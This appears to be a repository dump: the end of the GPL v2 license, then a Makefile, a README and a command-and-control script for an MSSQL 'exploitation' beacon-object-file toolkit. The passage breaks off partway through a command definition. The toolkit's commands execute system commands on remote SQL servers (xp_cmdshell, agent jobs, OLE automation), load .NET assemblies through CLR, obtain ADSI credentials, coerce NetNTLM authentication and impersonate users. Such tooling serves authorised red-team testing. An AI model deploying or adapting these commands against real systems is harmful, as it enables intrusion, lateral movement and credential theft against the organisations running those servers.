this License, whose permissions for other licensees extend to the
entire whole, and thus to each and every part regardless of who wrote it.

Thus, it is not the intent of this section to claim rights or contest
your rights to work written entirely by you; rather, the intent is to
exercise the right to control the distribution of derivative or
collective works based on the Program.

In addition, mere aggregation of another work not based on the Program
with the Program (or with a work based on the Program) on a volume of
a storage or distribution medium does not bring the other work under
the scope of this License.

  3. You may copy and distribute the Program (or a work based on it,
under Section 2) in object code or executable form under the terms of
Sections 1 and 2 above provided that you also do one of the following:

    a) Accompany it with the complete corresponding machine-readable
    source code, which must be distributed under the terms of Sections
    1 and 2 above on a medium customarily used for software interchange; or,

    b) Accompany it with a written offer, valid for at least three
    years, to give any third party, for a charge no more than your
    cost of physically performing source distribution, a complete
    machine-readable copy of the corresponding source code, to be
    distributed under the terms of Sections 1 and 2 above on a medium
    customarily used for software interchange; or,

    c) Accompany it with the information you received as to the offer
    to distribute corresponding source code.  (This alternative is
    allowed only for noncommercial distribution and only if you
    received the program in object code or executable form with such
    an offer, in accord with Subsection b above.)

The source code for a work means the preferred form of the work for
making modifications to it.  For an executable work, complete source
code means all the source code for all modules it contains, plus any
associated interface definition files, plus the scripts used to
control compilation and installation of the executable.  However, as a
special exception, the source code distributed need not include
anything that is normally distributed (in either source or binary
form) with the major components (compiler, kernel, and so on) of the
operating system on which the executable runs, unless that component
itself accompanies the executable.

If distribution of executable or object code is made by offering
access to copy from a designated place, then offering equivalent
access to copy the source code from the same place counts as
distribution of the source code, even though third parties are not
compelled to copy the source along with the object code.

  4. You may not copy, modify, sublicense, or distribute the Program
except as expressly provided under this License.  Any attempt
otherwise to copy, modify, sublicense or distribute the Program is
void, and will automatically terminate your rights under this License.
However, parties who have received copies, or rights, from you under
this License will not have their licenses terminated so long as such
parties remain in full compliance.

  5. You are not required to accept this License, since you have not
signed it.  However, nothing else grants you permission to modify or
distribute the Program or its derivative works.  These actions are
prohibited by law if you do not accept this License.  Therefore, by
modifying or distributing the Program (or any work based on the
Program), you indicate your acceptance of this License to do so, and
all its terms and conditions for copying, distributing or modifying
the Program or works based on it.

  6. Each time you redistribute the Program (or any work based on the
Program), the recipient automatically receives a license from the
original licensor to copy, distribute or modify the Program subject to
these terms and conditions.  You may not impose any further
restrictions on the recipients' exercise of the rights granted herein.
You are not responsible for enforcing compliance by third parties to
this License.

  7. If, as a consequence of a court judgment or allegation of patent
infringement or for any other reason (not limited to patent issues),
conditions are imposed on you (whether by court order, agreement or
otherwise) that contradict the conditions of this License, they do not
excuse you from the conditions of this License.  If you cannot
distribute so as to satisfy simultaneously your obligations under this
License and any other pertinent obligations, then as a consequence you
may not distribute the Program at all.  For example, if a patent
license would not permit royalty-free redistribution of the Program by
all those who receive copies directly or indirectly through you, then
the only way you could satisfy both it and this License would be to
refrain entirely from distribution of the Program.

If any portion of this section is held invalid or unenforceable under
any particular circumstance, the balance of the section is intended to
apply and the section as a whole is intended to apply in other
circumstances.

It is not the purpose of this section to induce you to infringe any
patents or other property right claims or to contest validity of any
such claims; this section has the sole purpose of protecting the
integrity of the free software distribution system, which is
implemented by public license practices.  Many people have made
generous contributions to the wide range of software distributed
through that system in reliance on consistent application of that
system; it is up to the author/donor to decide if he or she is willing
to distribute software through any other system and a licensee cannot
impose that choice.

This section is intended to make thoroughly clear what is believed to
be a consequence of the rest of this License.

  8. If the distribution and/or use of the Program is restricted in
certain countries either by patents or by copyrighted interfaces, the
original copyright holder who places the Program under this License
may add an explicit geographical distribution limitation excluding
those countries, so that distribution is permitted only in or among
countries not thus excluded.  In such case, this License incorporates
the limitation as if written in the body of this License.

  9. The Free Software Foundation may publish revised and/or new versions
of the General Public License from time to time.  Such new versions will
be similar in spirit to the present version, but may differ in detail to
address new problems or concerns.

Each version is given a distinguishing version number.  If the Program
specifies a version number of this License which applies to it and "any
later version", you have the option of following the terms and conditions
either of that version or of any later version published by the Free
Software Foundation.  If the Program does not specify a version number of
this License, you may choose any version ever published by the Free Software
Foundation.

  10. If you wish to incorporate parts of the Program into other free
programs whose distribution conditions are different, write to the author
to ask for permission.  For software which is copyrighted by the Free
Software Foundation, write to the Free Software Foundation; we sometimes
make exceptions for this.  Our decision will be guided by the two goals
of preserving the free status of all derivatives of our free software and
of promoting the sharing and reuse of software generally.

                            NO WARRANTY

  11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY
FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW.  EXCEPT WHEN
OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES
PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED
OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE.  THE ENTIRE RISK AS
TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU.  SHOULD THE
PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING,
REPAIR OR CORRECTION.

  12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR
REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES,
INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING
OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED
TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY
YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER
PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE
POSSIBILITY OF SUCH DAMAGES.

                     END OF TERMS AND CONDITIONS

            How to Apply These Terms to Your New Programs

  If you develop a new program, and you want it to be of the greatest
possible use to the public, the best way to achieve this is to make it
free software which everyone can redistribute and change under these terms.

  To do so, attach the following notices to the program.  It is safest
to attach them to the start of each source file to most effectively
convey the exclusion of warranty; and each file should have at least
the "copyright" line and a pointer to where the full notice is found.

    <one line to give the program's name and a brief idea of what it does.>
    Copyright (C) <year>  <name of author>

    This program is free software; you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation; either version 2 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License along
    with this program; if not, write to the Free Software Foundation, Inc.,
    51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.

Also add information on how to contact you by electronic and paper mail.

If the program is interactive, make it output a short notice like this
when it starts in an interactive mode:

    Gnomovision version 69, Copyright (C) year name of author
    Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
    This is free software, and you are welcome to redistribute it
    under certain conditions; type `show c' for details.

The hypothetical commands `show w' and `show c' should show the appropriate
parts of the General Public License.  Of course, the commands you use may
be called something other than `show w' and `show c'; they could even be
mouse-clicks or menu items--whatever suits your program.

You should also get your employer (if you work as a programmer) or your
school, if any, to sign a "copyright disclaimer" for the program, if
necessary.  Here is a sample; alter the names:

  Yoyodyne, Inc., hereby disclaims all copyright interest in the program
  `Gnomovision' (which makes passes at compilers) written by James Hacker.

  <signature of Ty Coon>, 1 April 1989
  Ty Coon, President of Vice

This General Public License does not permit incorporating your program into
proprietary programs.  If your program is a subroutine library, you may
consider it more useful to permit linking proprietary applications with the
library.  If this is what you want to do, use the GNU Lesser General
Public License instead of this License.


================================================
FILE: AD-BOF/SQL-BOF/Makefile
================================================
CC64 = x86_64-w64-mingw32-gcc
STRIP64 = x86_64-w64-mingw32-strip --strip-unneeded
CFLAGS = -I ./src/common -w -Wno-incompatible-pointer-types -Os -s -DBOF -c

all: bof

bof:
	@(mkdir -p _bin/SQL 2>/dev/null) && echo 'creating _bin/SQL' || echo '_bin/SQL exists'
	@($(CC64) $(CFLAGS) src/SQL/1434udp/entry.c -o _bin/SQL/1434udp.x64.o       && $(STRIP64) _bin/SQL/1434udp.x64.o) && echo '[+] 1434udp' || echo '[!] 1434udp'
	@($(CC64) $(CFLAGS) src/SQL/adsi/entry.c -o _bin/SQL/adsi.x64.o             && $(STRIP64) _bin/SQL/adsi.x64.o) && echo '[+] adsi' || echo '[!] adsi'
	@($(CC64) $(CFLAGS) src/SQL/agentcmd/entry.c -o _bin/SQL/agentcmd.x64.o     && $(STRIP64) _bin/SQL/agentcmd.x64.o) && echo '[+] agentcmd' || echo '[!] agentcmd'
	@($(CC64) $(CFLAGS) src/SQL/agentstatus/entry.c -o _bin/SQL/agentstatus.x64.o && $(STRIP64) _bin/SQL/agentstatus.x64.o) && echo '[+] agentstatus' || echo '[!] agentstatus'
	@($(CC64) $(CFLAGS) src/SQL/checkrpc/entry.c -o _bin/SQL/checkrpc.x64.o     && $(STRIP64) _bin/SQL/checkrpc.x64.o) && echo '[+] checkrpc' || echo '[!] checkrpc'
	@($(CC64) $(CFLAGS) src/SQL/clr/entry.c -o _bin/SQL/clr.x64.o               && $(STRIP64) _bin/SQL/clr.x64.o) && echo '[+] clr' || echo '[!] clr'
	@($(CC64) $(CFLAGS) src/SQL/columns/entry.c -o _bin/SQL/columns.x64.o       && $(STRIP64) _bin/SQL/columns.x64.o) && echo '[+] columns' || echo '[!] columns'
	@($(CC64) $(CFLAGS) src/SQL/databases/entry.c -o _bin/SQL/databases.x64.o   && $(STRIP64) _bin/SQL/databases.x64.o) && echo '[+] databases' || echo '[!] databases'
	@($(CC64) $(CFLAGS) src/SQL/togglemodule/entry.c -o _bin/SQL/togglemodule.x64.o && $(STRIP64) _bin/SQL/togglemodule.x64.o) && echo '[+] togglemodule' || echo '[!] togglemodule'
	@($(CC64) $(CFLAGS) src/SQL/impersonate/entry.c -o _bin/SQL/impersonate.x64.o && $(STRIP64) _bin/SQL/impersonate.x64.o) && echo '[+] impersonate' || echo '[!] impersonate'
	@($(CC64) $(CFLAGS) src/SQL/info/entry.c -o _bin/SQL/info.x64.o             && $(STRIP64) _bin/SQL/info.x64.o) && echo '[+] info' || echo '[!] info'
	@($(CC64) $(CFLAGS) src/SQL/links/entry.c -o _bin/SQL/links.x64.o           && $(STRIP64) _bin/SQL/links.x64.o) && echo '[+] links' || echo '[!] links'
	@($(CC64) $(CFLAGS) src/SQL/olecmd/entry.c -o _bin/SQL/olecmd.x64.o         && $(STRIP64) _bin/SQL/olecmd.x64.o) && echo '[+] olecmd' || echo '[!] olecmd'
	@($(CC64) $(CFLAGS) src/SQL/query/entry.c -o _bin/SQL/query.x64.o           && $(STRIP64) _bin/SQL/query.x64.o) && echo '[+] query' || echo '[!] query'
	@($(CC64) $(CFLAGS) src/SQL/rows/entry.c -o _bin/SQL/rows.x64.o             && $(STRIP64) _bin/SQL/rows.x64.o) && echo '[+] rows' || echo '[!] rows'
	@($(CC64) $(CFLAGS) src/SQL/search/entry.c -o _bin/SQL/search.x64.o         && $(STRIP64) _bin/SQL/search.x64.o) && echo '[+] search' || echo '[!] search'
	@($(CC64) $(CFLAGS) src/SQL/smb/entry.c -o _bin/SQL/smb.x64.o               && $(STRIP64) _bin/SQL/smb.x64.o) && echo '[+] smb' || echo '[!] smb'
	@($(CC64) $(CFLAGS) src/SQL/tables/entry.c -o _bin/SQL/tables.x64.o         && $(STRIP64) _bin/SQL/tables.x64.o) && echo '[+] tables' || echo '[!] tables'
	@($(CC64) $(CFLAGS) src/SQL/users/entry.c -o _bin/SQL/users.x64.o           && $(STRIP64) _bin/SQL/users.x64.o) && echo '[+] users' || echo '[!] users'
	@($(CC64) $(CFLAGS) src/SQL/whoami/entry.c -o _bin/SQL/whoami.x64.o         && $(STRIP64) _bin/SQL/whoami.x64.o) && echo '[+] whoami' || echo '[!] whoami'
	@($(CC64) $(CFLAGS) src/SQL/xpcmd/entry.c -o _bin/SQL/xpcmd.x64.o           && $(STRIP64) _bin/SQL/xpcmd.x64.o) && echo '[+] xpcmd' || echo '[!] xpcmd'

clean:
	@(rm -rf _bin)

================================================
FILE: AD-BOF/SQL-BOF/README.md
================================================
# SQL-BOF
A library of beacon object files to interact with remote SQL servers and data. This collection is templated off the TrustedSec [CS-Situational-Awareness-BOF](https://github.com/trustedsec/CS-Situational-Awareness-BOF) collection and models the functionality of the [SQLRecon](https://github.com/skahwah/SQLRecon) project.

## Available commands
|Commands| Usage                                                                                   |Notes|
|--------|-----------------------------------------------------------------------------------------|-----|
|mssql 1434udp| [server IP]                                                                             |Enumerate SQL Server connection info |
|mssql adsi| [server] [ADSI_linkedserver] [-p port] [-d database] [-l linkedserver] [-i impersonate] |Obtain ADSI creds from ADSI linked server |
|mssql agentcmd | [server] [command] [-d database] [-l linkedserver] [-i impersonate]                     |Execute a system command using agent jobs |
|mssql agentstatus | [server] [-d database] [-l linkedserver] [-i impersonate]                               |Enumerate SQL agent status and jobs |
|mssql checkrpc | [server] [-d database] [-l linkedserver] [-i impersonate]                               |Enumerate RPC status of linked servers |
|mssql clr | [server] [dll_path] [function] [-d database] [-l linkedserver] [-i impersonate]         |Load and execute .NET assembly in a stored procedure |
|mssql columns | [server] [table] [-d database] [-l linkedserver] [-i impersonate]                       |Enumerate columns within a table |
|mssql databases | [server] [-d database] [-l linkedserver] [-i impersonate]                               |Enumerate databases on a server|
|mssql disableclr | [server] [-d database] [-l linkedserver] [-i impersonate]                               |Disable CLR integration |
|mssql disableole | [server] [-d database] [-l linkedserver] [-i impersonate]                               |Disable OLE Automation Procedures |
|mssql disablerpc | [server] [linkedserver] [-d database] [-i impersonate]                                  |Disable RPC and RPC out on a linked server |
|mssql disablexp | [server] [-d database] [-l linkedserver] [-i impersonate]                               |Disable xp_cmdshell |
|mssql enableclr | [server] [-d database] [-l linkedserver] [-i impersonate]                               |Enable CLR integration |
|mssql enableole | [server] [-d database] [-l linkedserver] [-i impersonate]                               |Enable OLE Automation Procedures |
|mssql enablerpc | [server] [linkedserver] [-d database] [-i impersonate]                                  |Enable RPC and RPC out on a linked server |
|mssql enablexp | [server] [-d database] [-l linkedserver] [-i impersonate]                               |Enable xp_cmdshell |
|mssql impersonate | [server] [-d database]                                                                  |Enumerate users that can be impersonated |
|mssql info | [server] [-d database]                                                                  |Gather information about the SQL server |
|mssql links | [server] [-d database] [-l linkedserver] [-i impersonate]                               |Enumerate linked servers |
|mssql olecmd | [server] [command] [-d database] [-l linkedserver] [-i impersonate]                     |Execute a system command using OLE automation procedures |
|mssql query | [server] [query] [-d database] [-l linkedserver] [-i impersonate]                       |Execute a custom SQL query |
|mssql rows | [server] [table] [-d database] [-l linkedserver] [-i impersonate]                       |Get the count of rows in a table |
|mssql search | [server] [search] [-d database] [-l linkedserver] [-i impersonate]                      |Search a table for a column name |
|mssql smb | [server] [\\\\listener] [-d database] [-l linkedserver] [-i impersonate]                |Coerce NetNTLM auth via xp_dirtree |
|mssql tables | [server] [-d database] [-l linkedserver] [-i impersonate]                               |Enumerate tables within a database |
|mssql users | [server] [-d database] [-l linkedserver] [-i impersonate]                               |Enumerate users with database access |
|mssql whoami | [server] [-d database] [-l linkedserver] [-i impersonate]                               |Gather logged in user, mapped user and roles |
|mssql xpcmd | [server] [command] [-d database] [-l linkedserver] [-i impersonate]                     |Execute a system command via xp_cmdshell |

## References
- [SQLRecon](https://github.com/skahwah/SQLRecon) by [@sanjivkawa](https://twitter.com/sanjivkawa)
- [PySQLRecon](https://github.com/Tw1sm/PySQLRecon)
- [CS-Situational-Awareness-BOF](https://github.com/trustedsec/CS-Situational-Awareness-BOF)


================================================
FILE: AD-BOF/SQL-BOF/SQL.axs
================================================
var metadata = {
    name: "MSSQL-BOF",
    description: "Microsof SQL Server Exploitation BOFs"
};

var _cmd_1434udp = ax.create_command("1434udp", "Obtain SQL Server connection information from 1434/UDP", "mssql 1434udp 192.168.10.10");
_cmd_1434udp.addArgString("serverIP", true, "SQL Server IP");
_cmd_1434udp.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let serverIP = parsed_json["serverIP"];

    let bof_params = ax.bof_pack("cstr", [serverIP]);
    let bof_path = ax.script_dir() + "_bin/SQL/1434udp." + ax.arch(id) + ".o";
    let message = "Task: Obtain SQL Server connection information";

    ax.execute_alias( id, cmdline, `execute bof "${bof_path}" ${bof_params}`, message );
});



var _cmd_adsi = ax.create_command("adsi", "Obtain ADSI creds from ADSI linked server", "mssql adsi [-p port] [-d database] [-l linkedserver] [-i impersonate] [-u user] [-P password] [server] [adsiserver]");
_cmd_adsi.addArgFlagInt("-p",    "port",         "Optional: ADSI port", 0);
_cmd_adsi.addArgFlagString("-d", "database",     "Optional: Database to use", "");
_cmd_adsi.addArgFlagString("-l", "linkedserver", "Optional: Execute through linked server", "");
_cmd_adsi.addArgFlagString("-i", "impersonate",  "Optional: User to impersonate during execution", "");
_cmd_adsi.addArgFlagString("-u", "user",         "Optional: SQL username for SQL authentication", "");
_cmd_adsi.addArgFlagString("-P", "password",     "Optional: SQL password for SQL authentication", "");
_cmd_adsi.addArgString("server",      true, "SQL server to connect to");
_cmd_adsi.addArgString("adsiserver",  true, "ADSI linked server name or address");
_cmd_adsi.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let server       = parsed_json["server"];
    let adsiserver   = parsed_json["adsiserver"];
    let port         = parsed_json["port"];
    let database     = parsed_json["database"];
    let linkedserver = parsed_json["linkedserver"];
    let impersonate  = parsed_json["impersonate"];
    let user         = parsed_json["user"];
    let password     = parsed_json["password"];

    let bof_params = ax.bof_pack( "cstr,cstr,cstr,cstr,cstr,int,cstr,cstr", [server, database, linkedserver, impersonate, adsiserver, port, user, password] );
    let bof_path = ax.script_dir() + "_bin/SQL/adsi." + ax.arch(id) + ".o";
    let message = "Task: Obtain ADSI credentials";

    ax.execute_alias( id, cmdline, `execute bof "${bof_path}" ${bof_params}`, message );
});



var _cmd_agentcmd = ax.create_command("agentcmd", "Execute a system command using agent jobs", "mssql agentcmd [-d database] [-l linkedserver] [-i impersonate] [-u user] [-p password] [server] [command]");
_cmd_agentcmd.addArgFlagString("-d", "database",     "Optional: Database to use", "");
_cmd_agentcmd.addArgFlagString("-l", "linkedserver", "Optional: Execute through linked server", "");
_cmd_agentcmd.addArgFlagString("-i", "impersonate",  "Optional: User to impersonate during execution", "");
_cmd_agentcmd.addArgFlagString("-u", "user",         "Optional: SQL username for SQL authentication", "");
_cmd_agentcmd.addArgFlagString("-p", "password",     "Optional: SQL password for SQL authentication", "");
_cmd_agentcmd.addArgString("server",      true, "SQL server to connect to");
_cmd_agentcmd.addArgString("command",     true, "System command to execute via agent job");
_cmd_agentcmd.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let server       = parsed_json["server"];
    let command      = parsed_json["command"];
    let database     = parsed_json["database"];
    let linkedserver = parsed_json["linkedserver"];
    let impersonate  = parsed_json["impersonate"];
    let user         = parsed_json["user"];
    let password     = parsed_json["password"];

    let bof_params = ax.bof_pack( "cstr,cstr,cstr,cstr,cstr,cstr,cstr", [server, database, linkedserver, impersonate, command, user, password] );
    let bof_path = ax.script_dir() + "_bin/SQL/agentcmd." + ax.arch(id) + ".o";
    let message = "Task: Execute system command via SQL Agent";

    ax.execute_alias( id, cmdline, `execute bof "${bof_path}" ${bof_params}`, message );
});



var _cmd_agentstatus = ax.create_command("agentstatus", "Enumerate SQL Agent status and jobs", "mssql agentstatus [-d database] [-l linkedserver] [-i impersonate] [-u user] [-p password] [server]");
_cmd_agentstatus.addArgFlagString("-d", "database",     "Optional: Database to use", "");
_cmd_agentstatus.addArgFlagString("-l", "linkedserver", "Optional: Execute through linked server", "");
_cmd_agentstatus.addArgFlagString("-i", "impersonate",  "Optional: User to impersonate during execution", "");
_cmd_agentstatus.addArgFlagString("-u", "user",         "Optional: SQL username for SQL authentication", "");
_cmd_agentstatus.addArgFlagString("-p", "password",     "Optional: SQL password for SQL authentication", "");
_cmd_agentstatus.addArgString("server", true, "SQL server to connect to");
_cmd_agentstatus.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let server       = parsed_json["server"];
    let database     = parsed_json["database"];
    let linkedserver = parsed_json["linkedserver"];
    let impersonate  = parsed_json["impersonate"];
    let user         = parsed_json["user"];
    let password     = parsed_json["password"];

    let bof_params = ax.bof_pack( "cstr,cstr,cstr,cstr,cstr,cstr", [server, database, linkedserver, impersonate, user, password] );
    let bof_path = ax.script_dir() + "_bin/SQL/agentstatus." + ax.arch(id) + ".o";
    let message = "Task: Enumerate SQL Agent status and jobs";

    ax.execute_alias( id, cmdline, `execute bof "${bof_path}" ${bof_params}`, message );
});



var _cmd_checkrpc = ax.create_command("checkrpc", "Enumerate RPC status of linked servers", "mssql checkrpc [-d database] [-l linkedserver] [-i impersonate] [-u user] [-p password] [server]");
_cmd_checkrpc.addArgFlagString("-d", "database",     "Optional: Database to use", "");
_cmd_checkrpc.addArgFlagString("-l", "linkedserver", "Optional: Execute through linked server", "");
_cmd_checkrpc.addArgFlagString("-i", "impersonate",  "Optional: User to impersonate during execution", "");
_cmd_checkrpc.addArgFlagString("-u", "user",         "Optional: SQL username for SQL authentication", "");
_cmd_checkrpc.addArgFlagString("-p", "password",     "Optional: SQL password for SQL authentication", "");
_cmd_checkrpc.addArgString("server", true, "SQL server to connect to");
_cmd_checkrpc.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let server       = parsed_json["server"];
    let database     = parsed_json["database"];
    let linkedserver = parsed_json["linkedserver"];
    let impersonate  = parsed_json["impersonate"];
    let user         = parsed_json["user"];
    let password     = parsed_json["password"];

    let bof_params = ax.bof_pack( "cstr,cstr,cstr,cstr,cstr,cstr", [server, database, linkedserver, impersonate, user, password] );
    let bof_path = ax.script_dir() + "_bin/SQL/checkrpc." + ax.arch(id) + ".o";
    let message = "Task: Enumerate RPC status on linked servers";

    ax.execute_alias( id, cmdline, `execute bof "${bof_path}" ${bof_params}`, message );
});



var _cmd_clr = ax.create_command("clr", "Load and execute a .NET assembly in a stored procedure", "mssql clr -h [hash] [-d database] [-l linkedserver] [-i impersonate] [-u user] [-p password] [server] [dll_path] [function]");
_cmd_clr.addArgFlagString("-h", "hash",         "Required: SHA-512 hash of DLL", "");
_cmd_clr.addArgFlagString("-d", "database",     "Optional: Database to use", "");
_cmd_clr.addArgFlagString("-l", "linkedserver", "Optional: Execute through linked server", "");
_cmd_clr.addArgFlagString("-i", "impersonate",  "Optional: User to impersonate during execution", "");
_cmd_clr.addArgFlagString("-u", "user",         "Optional: SQL username for SQL authentication", "");
_cmd_clr.addArgFlagString("-p", "password",     "Optional: SQL password for SQL authentication", "");
_cmd_clr.addArgString("server",   true, "SQL server to connect to");
_cmd_clr.addArgString("dll_path", true, "Path to .NET assembly DLL");
_cmd_clr.addArgString("function", true, "Entry-point function name");
_cmd_clr.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let server       = parsed_json["server"];
    let dllPath      = parsed_json["dll_path"];
    let functionName = parsed_json["function"];
    let database     = parsed_json["database"];
    let linkedserver = parsed_json["linkedserver"];
    let impersonate  = parsed_json["impersonate"];
    let userHash     = parsed_json["hash"];
    let user         = parsed_json["user"];
    let password     = parsed_json["password"];

    let base64Data = ax.file_read(dllPath);

    if(base64Data.length === 0) {
        throw new Error(`file ${dllPath} not readed`);
    }

    let binaryString = "";

    try {
        let b64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
        base64Data = base64Data.replace(/[^A-Za-z0-9\+\/\=]/g, "");

        for(let i = 0; i < base64Data.length; i += 4) {
            let e1 = b64.indexOf(base64Data.charAt(i));
            let e2 = b64.indexOf(base64Data.charAt(i + 1));
            let e3 = b64.indexOf(base64Data.charAt(i + 2));
            let e4 = b64.indexOf(base64Data.charAt(i + 3));

            let c1 = (e1 << 2) | (e2 >> 4);
            let c2 = ((e2 & 15) << 4) | (e3 >> 2);
            let c3 = ((e3 & 3) << 6) | e4;

            binaryString += String.fromCharCode(c1);
            if(e3 !== 64) binaryString += String.fromCharCode(c2);
            if(e4 !== 64) binaryString += String.fromCharCode(c3);
        }
    } catch(e) {
        throw new Error(`Base64 decode failed: ${e.message}`);
    }

    // Convert binary to hex
    let hexString = "";
    for(let i = 0; i < binaryString.length; i++) {
        let byte = binaryString.charCodeAt(i) & 0xFF;
        let hex = byte.toString(16);
        hexString += (hex.length === 1 ? '0' + hex : hex).toUpperCase();
    }

    // Validate DLL header
    if(hexString.substring(0, 4) !== "4D5A") {
        throw new Error(`Invalid DLL header: got ${hexString.substring(0, 4)}`);
    }


    if(!userHash || userHash.length === 0) {
        throw new Error("SHA-512 hash is required. Use -h flag to specify the hash.");
    }

    let dllHash = userHash.toUpperCase();

    // Pack all as cstr (9 strings, NO bytes type)
    let bof_params = ax.bof_pack("cstr,cstr,cstr,cstr,cstr,cstr,cstr,cstr,cstr",
        [server, database, linkedserver, impersonate, functionName, dllHash, hexString, user, password]);
    let bof_path = ax.script_dir() + "_bin/SQL/clr." + ax.arch(id) + ".o";
    let message = "Task: execute CLR assembly " + ax.file_basename(dllPath);

    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, message);
});




var _cmd_columns = ax.create_command("columns", "Enumerate columns within a table", "mssql columns [-d database] [-l linkedserver] [-i impersonate] [-u user] [-p password] [server] [table]");
_cmd_columns.addArgFlagString("-d", "database",     "Optional: Database to use", "");
_cmd_columns.addArgFlagString("-l", "linkedserver", "Optional: Execute through linked server", "");
_cmd_columns.addArgFlagString("-i", "impersonate",  "Optional: User to impersonate during execution", "");
_cmd_columns.addArgFlagString("-u", "user",         "Optional: SQL username for SQL authentication", "");
_cmd_columns.addArgFlagString("-p", "password",     "Optional: SQL password for SQL authentication", "");
_cmd_columns.addArgString("server", true, "SQL server to connect to");
_cmd_columns.addArgString("table",  true, "Table to enumerate columns from");
_cmd_columns.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let server       = parsed_json["server"];
    let table        = parsed_json["table"];
    let database     = parsed_json["database"];
    let linkedserver = parsed_json["linkedserver"];
    let impersonate  = parsed_json["impersonate"];
    let user         = parsed_json["user"];
    let password     = parsed_json["password"];

    let bof_params = ax.bof_pack( "cstr,cstr,cstr,cstr,cstr,cstr,cstr", [server, database, table, linkedserver, impersonate, user, password] );
    let bof_path = ax.script_dir() + "_bin/SQL/columns." + ax.arch(id) + ".o";
    let message = "Task: Enumerate columns in table";

    ax.execute_alias( id, cmdline, `execute bof "${bof_path}" ${bof_params}`, message );
});



var _cmd_databases = ax.create_command("databases", "Enumerate SQL databases", "mssql databases [-d database] [-l linkedserver] [-i impersonate] [-u user] [-p password] [server]");
_cmd_databases.addArgFlagString("-d", "database",     "Optional: Database to use", "");
_cmd_databases.addArgFlagString("-l", "linkedserver", "Optional: Execute through linked server", "");
_cmd_databases.addArgFlagString("-i", "impersonate",  "Optional: User to impersonate during execution", "");
_cmd_databases.addArgFlagString("-u", "user",         "Optional: SQL username for SQL authentication", "");
_cmd_databases.addArgFlagString("-p", "password",     "Optional: SQL password for SQL authentication", "");
_cmd_databases.addArgString("server", true, "SQL server to connect to");
_cmd_databases.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let server       = parsed_json["server"];
    let database     = parsed_json["database"];
    let linkedserver = parsed_json["linkedserver"];
    let impersonate  = parsed_json["impersonate"];
    let user         = parsed_json["user"];
    let password     = parsed_json["password"];

    let bof_params = ax.bof_pack("cstr,cstr,cstr,cstr,cstr,cstr", [server, database, linkedserver, impersonate, user, password]);
    let bof_path = ax.script_dir() + "_bin/SQL/databases." + ax.arch(id) + ".o";
    let message = "Task: SQL Server whoami BOF";

    ax.execute_alias( id, cmdline, `execute bof "${bof_path}" ${bof_params}`, message );
});



var _cmd_disableclr = ax.create_command("disableclr", "Disable CLR integration", "mssql disableclr [-d database] [-l linkedserver] [-i impersonate] [-u user] [-p password] [server]");
_cmd_disableclr.addArgFlagString("-d", "database",     "Optional: Database to use", "");
_cmd_disableclr.addArgFlagString("-l", "linkedserver", "Optional: Execute through linked server", "");
_cmd_disableclr.addArgFlagString("-i", "impersonate",  "Optional: User to impersonate during execution", "");
_cmd_disableclr.addArgFlagString("-u", "user",         "Optional: SQL username for SQL authentication", "");
_cmd_disableclr.addArgFlagString("-p", "password",     "Optional: SQL password for SQL authentication", "");
_cmd_disableclr.addArgString("server", true, "SQL server to connect to");
_cmd_disableclr.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let server       = parsed_json["server"];
    let database     = parsed_json["database"];
    let linkedserver = parsed_json["linkedserver"];
    let impersonate  = parsed_json["impersonate"];
    let user         = parsed_json["user"];
    let password     = parsed_json["password"];

    let bof_params = ax.bof_pack( "cstr,cstr,cstr,cstr,cstr,cstr,cstr,cstr", [server, database, linkedserver, impersonate, "clr enabled", "0", user, password] );
    let bof_path = ax.script_dir() + "_bin/SQL/togglemodule." + ax.arch(id) + ".o";
    let message = "Task: Disable CLR integration";

    ax.execute_alias( id, cmdline, `execute bof "${bof_path}" ${bof_params}`, message );
});



var _cmd_disableole = ax.create_command("disableole", "Disable OLE Automation Procedures", "mssql disableole [-d database] [-l linkedserver] [-i impersonate] [-u user] [-p password] [server]");
_cmd_disableole.addArgFlagString("-d", "database",     "Optional: Database to use", "");
_cmd_disableole.addArgFlagString("-l", "linkedserver", "Optional: Execute through linked server", "");
